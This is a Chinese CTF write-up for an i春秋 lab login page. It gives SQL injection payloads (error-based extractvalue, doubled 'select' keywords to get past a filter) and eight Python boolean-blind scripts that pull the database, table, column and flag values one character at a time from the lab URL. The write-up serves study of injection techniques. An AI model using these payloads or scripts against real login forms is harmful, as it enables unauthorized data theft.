同时先简单尝试一下，发现账号处存在字符型注入，用单引号闭合（1' or 1=1 和 1' and 1=2），使用 burp，如下
当然，借助右侧响应提示的是“账号不存在”还是“账号错误”可以进行布尔注入，但是既然有了提示，为什么不用呢？使用 extractvalue 报错注入，得到 database 为 note 1' or 1=1 and (extractvalue('anything',concat('~',(select database()))))#
然后理所应当，接下来的操作是 information_schema 三连，但是它老说我语法有错，我看了半天直接心态小崩，搁网上找了找别人的 wp，然后发现它过滤了 select……于是双写 select 来做 information_schema 三连。 1' or 1=1 and (extractvalue('anything',concat('~',(seselectlect group_concat(table_name) from information_schema.tables where table_schema='note'))))#&pass=456
1' or 1=1 and (extractvalue('anything',concat('~',(seselectlect group_concat(column_name) from information_schema.columns where table_name='fl4g'))))#
1' or 1=1 and (extractvalue('anything',concat('~',(selselectect flag from note.fl4g))))#
然后我还顺着我看的 wp 的做法把布尔注入也整了一遍。 爆数据库长度
# Boolean-based blind probe for the length of the current database name
# against the CTF lab's login.php. Each iteration posts the login form with
# an injected predicate in the `name` field and checks the response for a
# marker (`right`) that is presumably present only when the predicate is
# true — confirm against the page's actual "true"/"false" responses.
# Mitigation note: a parameterized query in login.php defeats this outright;
# the burst of near-identical POSTs differing only in the predicate is also
# an easy log/WAF signal.
# NOTE: reconstructed from a collapsed one-liner; only whitespace and comments were added.
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # unused in this script
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for i in range(30):  # candidate lengths 0..29
    # Closes the quoted username, ANDs the length test, comments out the rest.
    key = "admin' and " + "(length(database())=" + str(i) + ")#"
    data = {'name':key, 'pass':'123'}
    r = requests.post(url, data=data).text
    #print(r)
    if right in str(r):  # .text is already a str; str() is redundant
        print('the length of database is %s' %i)
爆数据库名
# Boolean-based blind recovery of the database name, one character at a time.
# `length` is hard-coded from the previous script's result; for each position
# the script tries ASCII codes 65..122 and keeps the one whose predicate
# produces the `right` marker in the response.
# Note: range(65,123) covers 'A'..'z' (plus a few punctuation codes) but not
# digits (48..57), so a name containing digits would come back incomplete.
# NOTE: reconstructed from a collapsed one-liner; the final print is placed
# after the loops (its original placement is not recoverable from the paste).
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # unused in this script
length=4  # database name length found by the previous probe
name=''
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for j in range(1,length+1):  # substr() positions are 1-based
    for i in range(65,123):
        key = "admin'"+" and (ascii(substr(database(),%d,1))=%d)#"%(j,i)
        data = {'name':key, 'pass':'111'}
        r = requests.post(url, data=data).text
        if right in str(r):  # .text is already a str; str() is redundant
            name+=chr(i)
print(name)
爆表长
# Boolean-based blind probe for the length of the first table name in the
# `note` schema. `0x6e6f7465` is the hex form of 'note', used so the payload
# needs no extra quote characters; `sselectelect` is the double-written
# keyword that survives the server's single-pass removal of `select`
# (as described in the write-up above).
# NOTE: reconstructed from a collapsed one-liner; only whitespace and comments were added.
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # unused in this script
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for i in range(30):  # candidate lengths 0..29
    key = "admin' and " + "length((sselectelect table_name FROM information_schema.tables WHERE table_schema=0x6e6f7465 limit 0,1))=" + str(i) + "#"
    data = {'name':key, 'pass':'111'}
    r = requests.post(url, data=data).text
    #print(r)
    if right in str(r):  # .text is already a str; str() is redundant
        print('the length of table is %s' %i)
爆表
# Boolean-based blind recovery of the first table name in the `note` schema,
# one character per position. `length` is hard-coded from the previous probe;
# ASCII codes 48..122 cover digits, letters and some punctuation.
# `0x6e6f7465` is hex for 'note'; `seselectlect` is the double-written keyword
# that survives the server's single-pass removal of `select`.
# The two commented-out `key` lines are earlier attempts left by the author.
# NOTE: reconstructed from a collapsed one-liner; the final print is placed
# after the loops (its original placement is not recoverable from the paste).
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # unused in this script
length=4  # table name length found by the previous probe
name=''
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for j in range(1,length+1):  # substr() positions are 1-based
    for i in range(48,123):
        #key = "admin%1$' and " + "(substr(database(),0,1)=" + i + ")#"
        #key = "admin%1$' and " + "(substr(database(),"+str(j)+",1)=" + i + ")#"
        key = "admin'"+" and (ascii(substr((seselectlect table_name FROM information_schema.tables WHERE table_schema=0x6e6f7465 limit 0,1),%d,1))=%d)#"%(j,i)
        data = { 'name':key, 'pass':'111'}
        r = requests.post(url, data=data).text
        if right in str(r):  # .text is already a str; str() is redundant
            name+=chr(i)
print(name)
爆列长
# Boolean-based blind probe for the length of the first column name in table
# `fl4g`. `0x666c3467` is the hex form of 'fl4g'; `seselectlect` is the
# double-written keyword that survives the server's single-pass removal of
# `select`.
# NOTE: reconstructed from a collapsed one-liner; only whitespace and comments were added.
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # unused in this script
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for i in range(30):  # candidate lengths 0..29
    key = "admin' and " + "length((seselectlect column_name FROM information_schema.columns WHERE table_name=0x666c3467 limit 0,1))=" + str(i) + "#"
    data = {'name':key, 'pass':'111'}
    r = requests.post(url, data=data).text
    #print(r)
    if right in str(r):  # .text is already a str; str() is redundant
        print('the length of column is %s' %i)
爆列
# Boolean-based blind recovery of the first column name in table `fl4g`,
# one character per position. `length` is hard-coded from the previous probe;
# ASCII codes 48..122 cover digits, letters and some punctuation.
# `0x666c3467` is hex for 'fl4g'; `seselectlect` is the double-written keyword
# that survives the server's single-pass removal of `select`.
# The two commented-out `key` lines are earlier attempts left by the author.
# NOTE: reconstructed from a collapsed one-liner; the final print is placed
# after the loops (its original placement is not recoverable from the paste).
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # unused in this script
length=4  # column name length found by the previous probe
name=''
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for j in range(1,length+1):  # substr() positions are 1-based
    for i in range(48,123):
        #key = "admin%1$' and " + "(substr(database(),0,1)=" + i + ")#"
        #key = "admin%1$' and " + "(substr(database(),"+str(j)+",1)=" + i + ")#"
        key = "admin'"+" and (ascii(substr((seselectlect column_name FROM information_schema.columns WHERE table_name=0x666c3467 limit 0,1),%d,1))=%d)#"%(j,i)
        data = {'name':key, 'pass':'111'}
        r = requests.post(url, data=data).text
        if right in str(r):  # .text is already a str; str() is redundant
            name+=chr(i)
print(name)
爆flag长
# Boolean-based blind probe for the length of the `flag` value in table
# `fl4g`; the candidate range is widened to 0..59 because a flag is longer
# than a schema name. `seselectlect` is the double-written keyword that
# survives the server's single-pass removal of `select`.
# Note: the success message still says "column" — copied from the previous
# script; it reports the flag length.
# NOTE: reconstructed from a collapsed one-liner; only whitespace and comments were added.
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # unused in this script
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for i in range(60):  # candidate lengths 0..59
    key = "admin' and " + "length((seselectlect flag FROM fl4g limit 0,1))=" + str(i) + "#"
    data = {'name':key, 'pass':'111'}
    r = requests.post(url, data=data).text
    #print(r)
    if right in str(r):  # .text is already a str; str() is redundant
        print('the length of column is %s' %i)
爆flag
# Boolean-based blind recovery of the `flag` value, one character per
# position. Unlike the earlier scripts this one iterates the candidate
# alphabet `dic` (digits, letters, selected punctuation) and compares
# ascii(substr(...)) with ord() of each candidate. `length` is hard-coded
# from the previous probe; `sselectelect` is the double-written keyword
# that survives the server's single-pass removal of `select`.
# A flag character outside `dic` would simply be skipped, leaving a gap.
# NOTE: reconstructed from a collapsed one-liner; the final print is placed
# after the loops (its original placement is not recoverable from the paste).
import requests
import string
dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="  # candidate alphabet
length=26  # flag length found by the previous probe
name=''
right = '8bef'  # substring expected in the "condition true" response
url = 'http://eci-2ze3zvy43f4mvrfyf12o.cloudeci1.ichunqiu.com/login.php'
for j in range(1,length+1):  # substr() positions are 1-based
    for i in dic:
        key = "admin'"+" and (ascii(substr((sselectelect flag FROM fl4g limit 0,1),%d,1))="%j+str(ord(i))+")#"
        data = {'name':key, 'pass':'111'}
        r = requests.post(url, data=data).text
        if right in str(r):  # .text is already a str; str() is redundant
            name+=i
print(name)